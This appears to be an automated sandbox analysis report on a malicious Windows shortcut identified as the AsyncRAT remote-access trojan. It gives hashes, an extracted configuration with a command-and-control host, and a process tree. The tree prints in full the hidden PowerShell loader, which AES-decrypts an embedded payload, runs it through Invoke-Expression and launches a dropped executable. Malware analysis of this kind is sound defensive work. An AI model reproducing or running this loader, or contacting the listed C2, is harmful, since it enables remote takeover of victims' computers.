Overview

overview

10

Static

static

1

RunScriptP...ed.lnk

windows7-x64

8

RunScriptP...ed.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2024 20:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RunScriptProtected.lnk

  • Size

    3KB

  • MD5

    7d7b89cb7fa6155b1e01334175ac1c5b

  • SHA1

    e777ad0ff4d4510ee345c06c34123b279b0b7ad6

  • SHA256

    7c8be71b3cfef2de7343bd48d20e33a6f2f94409d59c50f5ac3a5bbd703789fc

  • SHA512

    bd1ddf6149e7d51339ba326ad6fbd9d0b7eb4a2e6a0ca90cfd6a9024df0ee81e0cc2ac2e77e4c1b86146d4d06ccc24696c320d5ea166cf79d9062ff9d3b22038

Score
10/10
asyncratdefaultdiscoveryexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

alainlegrosper.ddns.net:6606

Mutex

sgXgvLmJ6SR3

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\RunScriptProtected.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:64
    • C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {param($a, $b) $KEYIV = '3Q1aUNn15Me1VlTQAQdGsm8ekXBkW2FFrSBt93j4N9Hg2QMZ60uGi6hdUECTkmywWn5vE4REAgxDeSoQIFpLq0zLiYkkC3WftAtNr6bgSVPoN2eYpSVCgq7FapPgUIfMZiDkS4Z7ibn7XIe6LuOlTPHS0ibnAmKQ5eCYXNZdOKzILr7TAIImXk5QH61FidAIOBZrbTQpHYRM98yNGmvMOzONCZQfuvr'; $command = [System.Convert]::FromBase64String($a); $key = [System.Convert]::FromBase64String($b); $e = New-Object System.Security.Cryptography.AesManaged; $e.Key = $key; $e.IV = $command[0..15]; $f = $e.CreateDecryptor(); $g = $f.TransformFinalBlock($command[16..$command.Length], 0, $command.Length - 16); $h = [System.Text.Encoding]::UTF8.GetString($g); Invoke-Expression $h; }" -a "qs9K8ECrxJ4RYgoGXBOVA5zoSztl2ZXPpldKefb9lZYVjASx3hpM1DG7Td3mzXA7B5gsnqQ74Cf8nu4rHbTQMgCpXtC7lraiyB1QP5NLcaIqIUGuJEX8Yeh6OaMu87mbALezjUugDAG8K6pcwYBuptmyjFZy3nos4aELD9IL8TOAxjBh/YryQcekOlA++MRBusflRl3EOvlALID34VFe304kjnyI10ZlLqUrqV3m7ag=" -b "I2gGFN92JQ7raC35ha14JzISlRbQCYzWrkxCskiY01c="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4028
      • C:\Users\Admin\AppData\Local\Temp\tmpA0D4.exe
        "C:\Users\Admin\AppData\Local\Temp\tmpA0D4.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4992

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tuub44lk.div.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmpA0D4.exe
    Filesize

    45KB

    MD5

    7618cd8136bc7dffe953a5d906581ead

    SHA1

    6c4dbdf1063f2b099349ac2389fb40de2b2f57f4

    SHA256

    5bac7b2cfe8310cf823d5e504203c290e35d8e8309f04edb99d4800ad230fe0d

    SHA512

    7684ebc1d09fd79d3e5812418f3bd64d5dd27c8713e08caae0bc31318a415d5ac6c10ba5433bfeef5f1bff275037a3e924b501ca29baf262fa8beebbfa8644ad

    Download Submit

  • memory/4028-2-0x00007FFCE6AF3000-0x00007FFCE6AF5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4028-8-0x000001C7C76B0000-0x000001C7C76D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4028-13-0x00007FFCE6AF0000-0x00007FFCE75B1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4028-14-0x00007FFCE6AF0000-0x00007FFCE75B1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4028-16-0x00007FFCE6AF0000-0x00007FFCE75B1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4028-28-0x00007FFCE6AF0000-0x00007FFCE75B1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4992-30-0x0000000000D30000-0x0000000000D42000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4992-33-0x0000000005E80000-0x0000000005F1C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/4992-34-0x00000000064D0000-0x0000000006A74000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4992-35-0x0000000005F90000-0x0000000005FF6000-memory.dmp

    Filesize

    408KB

    Download